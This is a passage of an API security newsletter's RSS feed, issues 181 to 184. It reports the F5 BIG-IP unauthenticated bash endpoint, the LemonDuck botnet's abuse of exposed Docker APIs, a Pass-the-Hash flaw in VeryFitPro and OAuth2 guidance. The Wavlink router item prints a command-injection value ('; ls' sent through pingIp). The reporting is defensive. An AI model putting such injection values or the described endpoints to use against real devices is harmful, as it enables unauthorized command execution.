<p>The post <a href="https://apisecurity.io/issue-185-three-trends-in-api-security-graphql-securing-risks-the-importance-of-api-discovery/">Issue 185: Three trends in API security, GraphQL securing risks, the importance of API discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 184: RCE in F5 BIG-IP suite, API security maturity, hardening GCP implementations</title>
		<link>https://apisecurity.io/issue-184-rce-in-f5-big-ip-suite-api-security-maturity-hardening-gcp-implementations/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 May 2022 17:00:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9528</guid>

					<description><![CDATA[<p>This week, we have news of a high severity remote code execution (RCE) vulnerability in the F5 BIG-IP security suite. We also feature an article from Curity on API security maturity, an article on hardening Google Cloud Platform implementations, and finally a threat matrix for GraphQL APIs. Vulnerability: RCE vulnerability in F5&#8217;s BIG-IP security suite [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-184-rce-in-f5-big-ip-suite-api-security-maturity-hardening-gcp-implementations/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-184-rce-in-f5-big-ip-suite-api-security-maturity-hardening-gcp-implementations/">Issue 184: RCE in F5 BIG-IP suite, API security maturity, hardening GCP implementations</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a high severity remote code execution (RCE) vulnerability in the F5 BIG-IP security suite. We also feature an article from Curity on API security maturity, an article on hardening Google Cloud Platform implementations, and finally a threat matrix for GraphQL APIs.</p>
<h2>Vulnerability: RCE vulnerability in F5&#8217;s BIG-IP security suite</h2>
<p>This week, F5&#8217;s BIG-IP load balancing and security suite <a href="https://thestack.technology/critical-new-big-ip-vulnerability-cve-2022-1388/" target="_blank" rel="noopener noreferrer">was affected by a Remote Code Execution (RCE) vulnerability</a>. The vulnerability is in the iControl REST API that allowed remote access to platform configuration. Attackers could gain access to an exposed endpoint <code>/mgmt/tm/util/bash</code> that did not require any authentication.</p>
<p>The vulnerability was given a CVSS score of 9.8 and is tracked as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388">CVE-2022-1388.</a> F5 have addressed the issue and advised users to patch their systems immediately. They also advised users of affected systems to block this API endpoint or restrict access to the ports that it uses.</p>
<p>According to Shodan and Censys searches, up to 16,000 BIG-IP systems with a management interface are exposed on the public internet. The Stack reports that users of the BIG-IP platform include Amazon, Google Cloud, Huawei, Microsoft, Korea Telecom, and numerous other telecommunication companies.</p>
<p>This is a rather severe case of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a> — always ensure that exposed APIs are fully authenticated to prevent anonymous access.</p>
<h2>Article: API security maturity model</h2>
<p>As readers of this newsletter are only too aware, the security implementation of APIs covers a broad spectrum. Curity has produced <a href="https://curity.io/resources/learn/the-api-security-maturity-model/" target="_blank" rel="noopener noreferrer">a four-level API security maturity model</a> to enable organizations to assess their current maturity and define a roadmap to improved security.</p>
<p>The key elements of each stage are as follows:</p>
<ul>
<li><strong>Level 0: API Keys and Basic Authentication</strong>: This level is the most elementary and — unfortunately — most widely occurring, particularly in legacy systems. In this case, authentication is over Basic Auth, or with API keys inserted into the header or the body.</li>
<li><strong>Level 1: Token-Based Authentication</strong>: At this level, a token exchange mechanism is used to identify the client based on a token. Although this level improves on level 0, there is still no indication of what the client is allowed to do, only their identity is verified through the possession of the token.</li>
<li><strong>Level 2: Token-Based Authorization</strong>: Modern APIs typically use OAuth2 to achieve the next level of maturity, allowing scope-based authorization to resources. However, improved maturity comes at the cost of increased complexity.</li>
<li><strong>Level 3: Centralized Trust Using Claims</strong>: On the final level of maturity, a strong claims-based model based typically on JWTs, typically signed for integrity, is used. Using standard protocols  like OAuth and OpenID Connect is advised.</li>
</ul>
<p>The key takeaway for me: highly mature APIs place trust in very few sources.</p>
<h2>Article: Hardening Google Cloud Platform implementations</h2>
<p>Cloud platforms are increasingly popular with developers due to their flexibility and advanced features driving innovation. Unfortunately, modern cloud platforms are extremely complex and open to misconfiguration.</p>
<p><a href="https://www.mitiga.io/blog/misconfiguration-hidden-dangers-cloud-control-plane" target="_blank" rel="noopener noreferrer">In a technical blog post</a>, the security research team at Mitiga describes a scenario of a &#8220;command and control&#8221; takeover on the Googe Cloud Platform (GCP). The details were reviewed by the security team at GCP who awarded a small bounty to the researcher but did not categorize the scenario as a vulnerability.</p>
<p>The researchers discovered that the GCP control plane exposed an API endpoint <code>getSerialPortOutput()</code> on the VM compute module. By sending arbitrary data to this API, the researchers believed that attackers could use this API to send &#8220;command and control&#8221; data to affected VMs. Although certain API calls required elevated privileges, access to <code>getSerialPortOutput()</code> required only very basic permissions. The GCP security team recommends using the VPC Service Controls to remove access to this API if it is not required.</p>
<p>The researchers provided the following general advice for hardening cloud systems:</p>
<ul>
<li>Avoid using built-in roles, rather use principles of least privilege.</li>
<li>Evaluate whether dangerous functionality is required and switch it off if not required.</li>
<li>Only allow access through standard, secure methods, such as SSH and RDP.</li>
<li>Run applications and services at the lowest privilege level possible.</li>
</ul>
<p>The usual advice applies: beware of hidden complexity and potentially insecure default configuration.</p>
<h2>Article: A threat matrix for GraphQL APIs</h2>
<p>Finally this week we have a handy guide for those tasked with the implementation of GraphQL solutions: <a href="https://github.com/nicholasaleks/graphql-threat-matrix" target="_blank" rel="noopener noreferrer">a threat matrix for common GraphQL backends</a>.</p>
<p>The author assesses how commonly used GraphQL backends rank according to a number of security topics relating to GraphQL:</p>
<ul>
<li>Validations</li>
<li>Field suggestions</li>
<li>Query depth limit</li>
<li>Query cost analysis</li>
<li>Automatic persisted queries</li>
<li>Introspection</li>
<li>Debug mode</li>
<li>Batch requests</li>
</ul>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9572" src="https://apisecurity.io/wp-content/uploads/2022/05/Article4b.jpg" alt="" width="603" height="534" /></p>
<p>A very useful guide for developers and pentesters alike. As per the previous article, beware of potentially insecure default configurations.</p>
<p>The post <a href="https://apisecurity.io/issue-184-rce-in-f5-big-ip-suite-api-security-maturity-hardening-gcp-implementations/">Issue 184: RCE in F5 BIG-IP suite, API security maturity, hardening GCP implementations</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 183: API vulnerability in VeryFitPro, exposed Docker APIs targeted by botnets, TruffleHog finds stored credentials</title>
		<link>https://apisecurity.io/issue-183-api-vulnerability-in-veryfitpro-exposed-docker-apis-targeted-by-botnets-trufflehog-finds-stored-credentials/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 May 2022 16:11:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9524</guid>

					<description><![CDATA[<p>This week, we have two API vulnerabilities: the first in the VeryFitPro app allowed attackers access to a backend API, while in the other LemonDuck botnet attacked exposed Docker APIs. On more positive side, we also have a new version of TruffleHog detecting of stored API credentials, as well as views on how to securely [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-183-api-vulnerability-in-veryfitpro-exposed-docker-apis-targeted-by-botnets-trufflehog-finds-stored-credentials/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-183-api-vulnerability-in-veryfitpro-exposed-docker-apis-targeted-by-botnets-trufflehog-finds-stored-credentials/">Issue 183: API vulnerability in VeryFitPro, exposed Docker APIs targeted by botnets, TruffleHog finds stored credentials</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have two API vulnerabilities: the first in the VeryFitPro app allowed attackers access to a backend API, while in the other LemonDuck botnet attacked exposed Docker APIs. On more positive side, we also have a new version of TruffleHog detecting of stored API credentials, as well as views on how to securely scale APIs in real-world backend platforms.</p>
<h2>Vulnerability: API vulnerability in VeryFitPro app</h2>
<p>Security researcher Martin Francois recently disclosed <a href="https://github.com/martinfrancois/CVE-2021-36460" target="_blank" rel="noopener noreferrer">a vulnerability in the VeryFitPro fitness tracking app</a> (versions 3.3.7 and lower).</p>
<p>The vulnerability potentially allows attackers to access the backend API without the original credentials. Francois disclosed the details in GitHub after two unsuccessful attempts to contact the vendor. At the time of writing, the vulnerability had not been addressed, and version 3.3.7 was still the most recent version of the app available on the Google Play store, with over 100k installations.</p>
<p>The vulnerability originates from the decision to store a password hash in a device database: if attackers get access to the database, they can reuse the hash to access the account of a targeted user. This method is known as the Pass-the-Hash attack. Francois describes a relatively simple proof of concept for the exploit, and suggests mitigating this by transmitting the user password in the body of the <code>POST</code> request over HTTPS.</p>
<h2>Vulnerability: Exposed Docker APIs targeted by botnets</h2>
<p>Crowdstrike provides coverage of <a href="https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/" target="_blank" rel="noopener noreferrer">ongoing attempts by the LemonDuck crypto mining botnet to target exposed Docker APIs</a> on Linux systems. The attacks are anonymized using proxy tools and evade detection because they do not show in Alibaba Cloud&#8217;s monitoring services. According to the article, crypto mining is becoming increasingly prevalent, with the majority of compromised Google Cloud Platform instances being used for mining.</p>
<p>Docker executes with elevated privileges so it can spin up containers and use OS resources. The Docker daemon also has the option to expose the management API through a port, typically <code>2375</code>. If this port is inadvertently exposed to the internet or unsecured, attackers may exploit it to execute arbitrary workloads on the host through Docker. Attacker can point the API to use a customer Docker <code>ENTRYPOINT</code> to execute a malicious <code>core.png</code> file which is actually a shell script:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9536" src="https://apisecurity.io/wp-content/uploads/2022/05/Article2.jpg" alt="" width="607" height="196" /></p>
<p>This script creates a cron job and downloads the active payload, which then performs the following operations:</p>
<ul>
<li>Kills processes based on names (competitor applications)</li>
<li>Kills known daemons, such as <code>sshd</code>, <code>syslog</code></li>
<li>Deletes know Indicators of Compromise file paths to evade detection</li>
<li>Kills know network connections (to competitor websites)</li>
</ul>
<p>The script then evades Alibaba Cloud&#8217;s protection services, and finally downloads the crypto mining payload which then begins mining. Finally, a proxy disguises the recipient crypto wallet to avoid identification.</p>
<p>The key takeaway is to be very careful if exposing the Docker API port, particularly if connected to a public network.</p>
<h2>Tools: TruffleHog v3 detects stored API credentials</h2>
<p>Leaked API credentials (keys, passwords, and tokens) is one of the most prevalent challenges in security API deployments, and we have frequently featured articles such as <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/" target="_blank" rel="noopener noreferrer">this one</a> about bad practices in storing credentials. One of the stalwart tools of the trade for detecting leaked credentials is TruffleHog. This week, PortSwigger has featured <a href="https://portswigger.net/daily-swig/trufflehog-v3-api-key-leak-detection-tool-adds-support-for-more-than-600-types" target="_blank" rel="noopener noreferrer">details of the newly released TruffleHog version 3</a>, with improved capabilities for API key detection.</p>
<p>TruffleHog can detect credentials leaked through JavaScript or overly permissive CORS settings in APIs. Importantly, TruffleHog can also scan GitHub repositories to discover exposed credentials. The new version supports up to 639 new key types, including AWS, Azure, Confluent, Facebook, and GitHub.</p>
<p>A key new feature in this release is verifying if a suspected leaked credential is still valid by testing access against the affected backend service. This powerful feature should be a great boon to security teams for reducing the false positives from expired or invalidated credentials.</p>
<p>TruffleHog comes highly recommended in my experience, and anyone wishing to actively monitor credential leaks should check it out.</p>
<h2>Article: Scaling APIs in real-world backend platforms</h2>
<p>This week, our final article is courtesy of Gary Archer at Curity who discusses <a href="https://thenewstack.io/securely-scaling-the-myriad-apis-in-real-world-backend-platforms/" target="_blank" rel="noopener noreferrer">the security challenges of scaling APIs in real-world backend platforms</a>. Although there are numerous well-written articles about the handling and validating JSON web tokens (JWTs), the articles often lack the depth of coverage on how to scale the use of JWTs to large systems, with multiple APIs and clients.</p>
<p>This article is an excellent discussion on the challenges for the handling of JWTs in complex topologies, and it makes a number of recommendations on topics, such as:</p>
<ul>
<li>Use reverse proxies to return opaque tokens rather than raw JWTs.</li>
<li>Use standard security libraries for JWT validation, and include security parameters in the claims section rather than in headers or URL paths.</li>
<li>For multiple APIs, use a so-called entrypoint API to federate access to internal APIs based on the calling client.</li>
<li>Extend JWTs to allow the initial authorizing server to add additional claims to them to be consumed downstream.</li>
<li>Use a separate short-lived token in callbacks to avoid the challenge that asynchronous methods pose for maintaining the state and identity of the original requester.</li>
<li>Be aware of the additional challenges regarding authorization and identity posed by partner APIs.</li>
<li>Design clients to be reliable and resilient to mitigate complexities of microservices with multiple components that present more points of failure.</li>
</ul>
<p>Great food for thought in this article, thanks for the author for the contribution.</p>
<p>The post <a href="https://apisecurity.io/issue-183-api-vulnerability-in-veryfitpro-exposed-docker-apis-targeted-by-botnets-trufflehog-finds-stored-credentials/">Issue 183: API vulnerability in VeryFitPro, exposed Docker APIs targeted by botnets, TruffleHog finds stored credentials</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 182: Drupal patches API vulnerability, Google Cloud on API security challenges, guide to OAuth2</title>
		<link>https://apisecurity.io/issue-182-drupal-patches-api-vulnerability-google-cloud-api-security-challenges-guide-oauth2/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 Apr 2022 19:21:31 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9488</guid>

					<description><![CDATA[<p>This week, we have details of an API vulnerability in the Drupal platform, allowing an attacker to bypass access controls. We also feature views from Google Cloud on challenges to API security, a comprehensive guide to OAuth2, and finally a write up on how GitHub deviates from the implementation guidelines for OAuth2. Vulnerability: Drupal patches [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-182-drupal-patches-api-vulnerability-google-cloud-api-security-challenges-guide-oauth2/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-182-drupal-patches-api-vulnerability-google-cloud-api-security-challenges-guide-oauth2/">Issue 182: Drupal patches API vulnerability, Google Cloud on API security challenges, guide to OAuth2</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details of an API vulnerability in the Drupal platform, allowing an attacker to bypass access controls. We also feature views from Google Cloud on challenges to API security, a comprehensive guide to OAuth2, and finally a write up on how GitHub deviates from the implementation guidelines for OAuth2.</p>
<h2>Vulnerability: Drupal patches an API vulnerability allowing access bypass</h2>
<p>This week, <a href="https://www.securityweek.com/access-bypass-data-overwrite-vulnerabilities-patched-drupal" target="_blank" rel="noopener noreferrer">Drupal has announced a security update</a> to patch a vulnerability in the API of version 9.3 of their platform, a popular open-source content management system.</p>
<p>Drupal exposes an API to facilitate integration and plugin framework. Unfortunately, Drupal has disclosed that an API did not adequately authorize access to the backend. Potentially, this could have allowed attackers to access content outside of the core Drupal access controls. As Drupal explains: <cite>&#8220;This API was not completely integrated with existing permissions&#8221;.</cite></p>
<p>Fortunately, only version 9.3 of the platform was affected, and Drupal has already released a security update.</p>
<p>This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a> — be sure to adequately authenticate all APIs.</p>
<h2>Article: Google Cloud views on API security challenges</h2>
<p>The Register has provided coverage of a recent thought piece from <a href="https://www.theregister.com/2022/04/26/google_cloud_api/" target="_blank" rel="noopener noreferrer">Google Cloud on the challenges of API security particularly in cloud environments</a>.</p>
<p>The authors offer opinions (some of them strong) and thoughts on a wide variety of API topics, namely:</p>
<ul>
<li><strong>API security needs will push zero trust adoption</strong>: Although zero-trust promises great benefits for distributed API architectures, the authors&#8217; view is that adoption rates are still low, typically only one in five.</li>
<li><strong>Microservice APIs on the rise</strong>: While APIs facilitate the development of microservice architectures, developers should be sure they are not creating new complexity unnecessarily — <cite>&#8220;the worst of the monoliths, the distributed monolith&#8221;.</cite></li>
<li><strong>APIs keep EDA alive</strong>: APIs enable event-driven architectures (EDAs), allowing serverless, asynchronous, and stream use cases. Beware of security considerations, though!</li>
<li><strong>REST will step aside for GraphQL</strong>: The authors predict that GraphQL will overtake REST APIs by 2025, which has a big impact on security teams.</li>
<li><strong>Multi-APIM will rise to support hybrid deployments</strong>: Hybrid cloud environments will lead to the multiple API management deployments to manage same APIs.</li>
<li><strong>Vendors will unlock conversational APIs</strong>: APIs will increasingly deliver voice experiences to customers, which brings privacy and protection challenges with it.</li>
<li><strong>APIs will stop being shadow IT</strong>: APIs will become the standard conduit through which data will be exposed in organizations. Savvy security teams should embrace this and ensure that a standard process exists for developing, deploying, and governing APIs.</li>
</ul>
<p>API security is going to be increasingly challenging, and it&#8217;s pleasing to see the cloud providers giving the topic due focus.</p>
<h2>Guide: Part 1 of a comprehensive guide to OAuth2</h2>
<p>The correct design and implementation of the OAuth2 specification are vital to API security. Unfortunately, they also are one of the more confusing topics facing developers tasked with implementing API authentication and authorization. This week, <a href="https://stackoverflow.blog/2022/04/11/the-complete-guide-to-protecting-your-apis-with-oauth2/" target="_blank" rel="noopener noreferrer">we feature one of the best guides</a> on the topic from Dan Moore, courtesy of the StackOverflow blog.</p>
<p>The guide assumes minimal knowledge of OAuth2, and instead provides an orientation and outlines the many advantages of using OAuth2. The core OAuth2 standards are covered briefly, as are some of the more common one of the specialized OAuth2 standards.</p>
<p>The most common challenge for developers is which grant type to use. Here, the guide covers the pros and cons of each in some detail and concludes with alternatives to OAuth2.</p>
<p>A good read for beginners to OAuth2, and I look forward to featuring the second part.</p>
<h2>Article: How GitHub deviates from OAuth2 implementation guidelines</h2>
<p>This week, our second article is another one on OAuth2, and it is definitely one for the more technically-minded reader: <a href="https://darutk.medium.com/spec-violations-in-github-oauth-implementation-and-security-considerations-48a7f8dfa335" target="_blank" rel="noopener noreferrer">a researcher describes various deviations in the GitHub implementation of OAuth2</a>.</p>
<p>The article covers three main areas: specification violations, GitHub-specific extensions, and security considerations. Of these, it is the security considerations that are of most interest:</p>
<ul>
<li>The Proof Key for Code Exchange by OAuth Public Clients (PKCE) (RFC7636) should be supported to prevent attackers from exchanging stolen authorization codes.</li>
<li>The OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens (RFC8705) should be supported to further reduce an attacker&#8217;s ability to use stolen access tokens.</li>
<li>More secure client authentication methods should be used — the recommendation is to follow <a href="https://fapi.openid.net/" target="_blank" rel="noopener noreferrer">Financial-grade API</a> (FAPI) specifications.</li>
</ul>
<p>The article serves to illustrate that the devil really is in the details when authentication and authorization are concerned. Wherever possible, be sure to adopt industry best-practices, such as FAPI.</p>
<h2>Webinar: Actively Monitor and Defend Your APIs with 42Crunch and the Azure Sentinel Platform</h2>
<p>APIs are increasingly the number one attack vector for adversaries, due to their growing abundance and ease of attack when using automated scripts and tools. Most public APIs are under constant attack by skilled human adversaries and growing legions of bots. Well-designed, secure APIs are critical to mitigating the risk of attack, but it is essential to also actively monitor and defend your APIs — the frontline of your perimeter — through direct integration into SIEM and SOCs.</p>
<p>In this webinar, <a href="https://42crunch.com/actively-monitor-and-defend-your-apis-with-42crunch-and-the-azure-sentinel-platform/" target="_blank" rel="noopener noreferrer">42Crunch and CyberProof show how to proactively integrate API access logs into the Azure Sentinel platform</a>, demonstrating the following:</p>
<ul>
<li>Ingestion of API logs directly into Log Analytics workspaces</li>
<li>Creating basic alerts on common API error conditions</li>
<li>Enrichment of API logs with threat intelligence data, such as known bad IPs</li>
<li>Detecting attack patterns for common adversarial tools like Kiterunner</li>
<li>Understanding of common bot behaviors and detection techniques</li>
<li>Automated protection of APIs through standard Azure protections, such as firewall.</li>
</ul>
<p><a href="https://42crunch.com/actively-monitor-and-defend-your-apis-with-42crunch-and-the-azure-sentinel-platform/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9501" src="https://apisecurity.io/wp-content/uploads/2022/04/Article5.jpg" alt="" width="593" height="316" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-182-drupal-patches-api-vulnerability-google-cloud-api-security-challenges-guide-oauth2/">Issue 182: Drupal patches API vulnerability, Google Cloud on API security challenges, guide to OAuth2</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webinar &#8211; Actively Monitor and Defend Your APIs with 42Crunch and the Azure Sentinel Platform</title>
		<link>https://apisecurity.io/webinar-actively-monitor-defend-apis-42crunch-azure-sentinel-platform/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 Apr 2022 12:15:46 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9493</guid>

					<description><![CDATA[<p>APIs are increasingly the number one attack vector for adversaries due to their growing abundance and ease of attack via automated scripts and tools. Most public APIs are under constant attack by skilled human adversaries and growing legions of bots. Well-designed, secure APIs are critical to mitigating the risk of attack, but it is essential [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/webinar-actively-monitor-defend-apis-42crunch-azure-sentinel-platform/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/webinar-actively-monitor-defend-apis-42crunch-azure-sentinel-platform/">Webinar &#8211; Actively Monitor and Defend Your APIs with 42Crunch and the Azure Sentinel Platform</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://42crunch.com/actively-monitor-and-defend-your-apis-with-42crunch-and-the-azure-sentinel-platform/"><img loading="lazy" decoding="async" class="size-full wp-image-9491 aligncenter" src="https://apisecurity.io/wp-content/uploads/2022/04/CyberProof_DigitalAds_LI_TW-Webinar-P1_LIorganic_700x400px.png" alt="" width="700" height="400" /></a></p>
<p class="mt-4 mb-4 grey-out">APIs are increasingly the number one attack vector for adversaries due to their growing abundance and ease of attack via automated scripts and tools. Most public APIs are under constant attack by skilled human adversaries and growing legions of bots.</p>
<p>Well-designed, secure APIs are critical to mitigating the risk of attack, but it is essential to also actively monitor and defend your APIs &#8211; the frontline of your perimeter &#8211; via direct integration into SIEM and SOCs.</p>
<p>In this webinar 42Crunch and CyberProof demonstrate how to proactively integrate API access logs into the Azure Sentinel platform, demonstrating the following:</p>
<ul>
<li class="mb-1 grey-out">Ingestion of API logs directly into Log Analytics workspaces.</li>
<li class="mb-1 grey-out">Creating basic alerts on common API error conditions.</li>
<li class="mb-1 grey-out">Enrichment of API logs with threat intelligence data i.e. known bad IPs.</li>
<li class="mb-1 grey-out">Detecting attack patterns for common adversarial tools i.e. Kiterunner.</li>
<li class="mb-1 grey-out">Understanding of common bot behaviors and detection techniques.</li>
<li class="mb-1 grey-out">Automated protection of APIs via standard Azure protections i.e. firewall.</li>
</ul>
<p><a href="https://42crunch.com/actively-monitor-and-defend-your-apis-with-42crunch-and-the-azure-sentinel-platform/">Register Now</a></p>
<p>The post <a href="https://apisecurity.io/webinar-actively-monitor-defend-apis-42crunch-azure-sentinel-platform/">Webinar &#8211; Actively Monitor and Defend Your APIs with 42Crunch and the Azure Sentinel Platform</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 181: Vulnerability in Wavlink router, API exposing system passwords, views on internal APIs</title>
		<link>https://apisecurity.io/issue-181-vulnerability-wavlink-router-api-exposing-system-passwords-views-internal-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 Apr 2022 16:42:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9453</guid>

					<description><![CDATA[<p>This week, we have two API vulnerabilities: a command injection vulnerability in the control API of the Wavlink WL-WN531P3 router, and another one on the website of a security regulator in South Africa. In addition, we have views on the management of internal and external APIs, and how the new Lambda Function URLs on AWS [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-181-vulnerability-wavlink-router-api-exposing-system-passwords-views-internal-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-181-vulnerability-wavlink-router-api-exposing-system-passwords-views-internal-apis/">Issue 181: Vulnerability in Wavlink router, API exposing system passwords, views on internal APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have two API vulnerabilities: a command injection vulnerability in the control API of the Wavlink WL-WN531P3 router, and another one on the website of a security regulator in South Africa. In addition, we have views on the management of internal and external APIs, and how the new Lambda Function URLs on AWS enable rapid API development.</p>
<h2>Vulnerability: Command injection vulnerability in Wavlink WL-WN531P3 router</h2>
<p>This week&#8217;s first vulnerability is <a href="https://stigward.medium.com/wavlink-command-injection-cve-2022-23900-51988f6f15df" target="_blank" rel="noopener noreferrer">a command injection vulnerability in an internal API</a> of the Wavlink WL-WN531P3 router. A security researcher discovered an internal admin interface <code>/cgi-bin/adm.cgi</code> that the router UI used to execute arbitrary commands. Unfortunately, this endpoint was vulnerable in several ways:</p>
<ul>
<li>The endpoint did not enforce authentication at all — an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication.</a></li>
<li>The endpoint also did not enforce any Cross-Site Request Forgery (CSRF) protection, making the router vulnerable to attacks beyond the local network.</li>
<li>Most importantly, the endpoint was vulnerable to OS command injection attacks that allowed attackers to execute arbitrary commands on the router.</li>
</ul>
<p>The researcher initially discovered the vulnerability through the UI, which provided a diagnostic function to perform <code>ping</code> commands to user-supplied IP addresses. By manipulating the IP address to a malicious payload, such as <code>; ls</code>, the researcher observed that the router responded with a response that included a directory listing. This implied that the router concatenated the user input with the <code>ping</code> command to execute a potentially dangerous command, like <code>ping ; ls</code>. This is a textbook example of command injection common on IoT devices.</p>
<p>The researcher went on to use Burp Suite to discover that the session cookie could be removed, and that arbitrary commands could be injected by setting the <code>pingIp</code> parameter.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9460" src="https://apisecurity.io/wp-content/uploads/2022/04/Article1.jpg" alt="" width="632" height="406" /></p>
<p>The vulnerability is tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23900" target="_blank" rel="noopener noreferrer">CVE-2022-23900</a>. At the time of writing, there was no patch available or other product update details.</p>
<h2>Vulnerability:  System passwords exposed through an API</h2>
<p>The second vulnerability this week is another example of broken authentication on a web API, this time <a href="https://mybroadband.co.za/news/security/441194-bad-system-design-exposes-south-african-private-security-bodys-incredibly-weak-passwords.html" target="_blank" rel="noopener noreferrer">affecting the website of a South African private security regulator</a>.</p>
<p>The vulnerability affected an API endpoint that allowed attackers to download a single XML file containing a variety of sensitive information of administrative users, including PII and passwords. The endpoint did not require any form of authentication, allowing totally anonymous access to this data. Another concern was that where passwords were used, they were very weak and could be easily guessed in many cases.</p>
<p>A local news site MyBroadband was made aware of the vulnerability and contacted the site owner who moved rapidly to close the vulnerability. There is no evidence that any attackers were able to exploit this vulnerability to leak information.</p>
<p>The key takeaway is to beware of backend web APIs as these are easily discoverable, and ensure that all APIs exposed publicly enforce robust authentication.</p>
<h2>Article: Management of internal versus external APIs</h2>
<p>A common contentious topic in the API community is the concept of &#8220;internal-only&#8221; APIs and whether they should be treated differently from external, or public, APIs. <a href="https://www.techtarget.com/searchapparchitecture/tip/The-management-approach-for-internal-vs-external-APIs" target="_blank" rel="noopener noreferrer">This week, we have views</a> on some considerations on these differences.</p>
<p>Internal APIs are most commonly used to interconnect internal backend systems in a standard manner to eliminate numerous bespoke integrations. Typically, these APIs may be referred to as east-west APIs. External APIs are intended to be exposed to either customers and API consumers, or to 3rd parties, like partners. Typically, these APIs  may be referred to as north-south APIs.</p>
<p>The author highlights six areas where management of internal and external APIs may be different:</p>
<ul>
<li>Publishing and discovery</li>
<li>Security and access control</li>
<li>Policy enforcement</li>
<li>Performance testing</li>
<li>Monitoring and metrics tracking</li>
<li>Deprecation/sunsetting processes</li>
</ul>
<p>Of interest to readers of this newsletter are the perspectives on security and access control and policy enforcement. Most importantly, internal APIs should still be subject to adequate API security measures and controls: the fact that they are internal does not mean they are immune to attack, or that they may not be exposed externally in the future. However, priority should be given to securing external APIs as these are the ones most readily accessible to bad actors. While external APIs generally require more specific access control policies (typically rate and quota limits) to reduce abuse or misuse by external users, internal APIs can be laxer with respect to access controls since their users can be more easily controlled.</p>
<h2>Article: New Lambda Function URLs on AWS</h2>
<p>Finally this week, we have coverage of the <a href="https://aws.amazon.com/blogs/aws/announcing-aws-lambda-function-urls-built-in-https-endpoints-for-single-function-microservices/" target="_blank" rel="noopener noreferrer">recently introduced Lambda Functions URLs on the AWS platform</a>. These are specifically aimed to facilitate the more rapid development of APIs without requiring the complexities of API gateways. The new feature allows API developers to create an API by specifying the endpoint URL, selecting the authorization type (either AWS_IAM or none), and the specifics of the backing Lambda function (language and architecture) as shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9472" src="https://apisecurity.io/wp-content/uploads/2022/04/Article4.jpg" alt="" width="603" height="595" /></p>
<p>If the endpoint does not use IAM authorization, the user must implement the authorization in the Lambda code, which can support JSON Web Token (JWT), OpenID Connect (OIDC), and OAuth2 authentication methods. It is also possible to configure Cross-Origin Resource Sharing (CORS) to control HTTP access from other servers.</p>
<p>Whilst this is likely to be a boon to API developers, it poses some new security challenges such as:</p>
<ul>
<li>How are these APIs to be governed, and tracked in an inventory?</li>
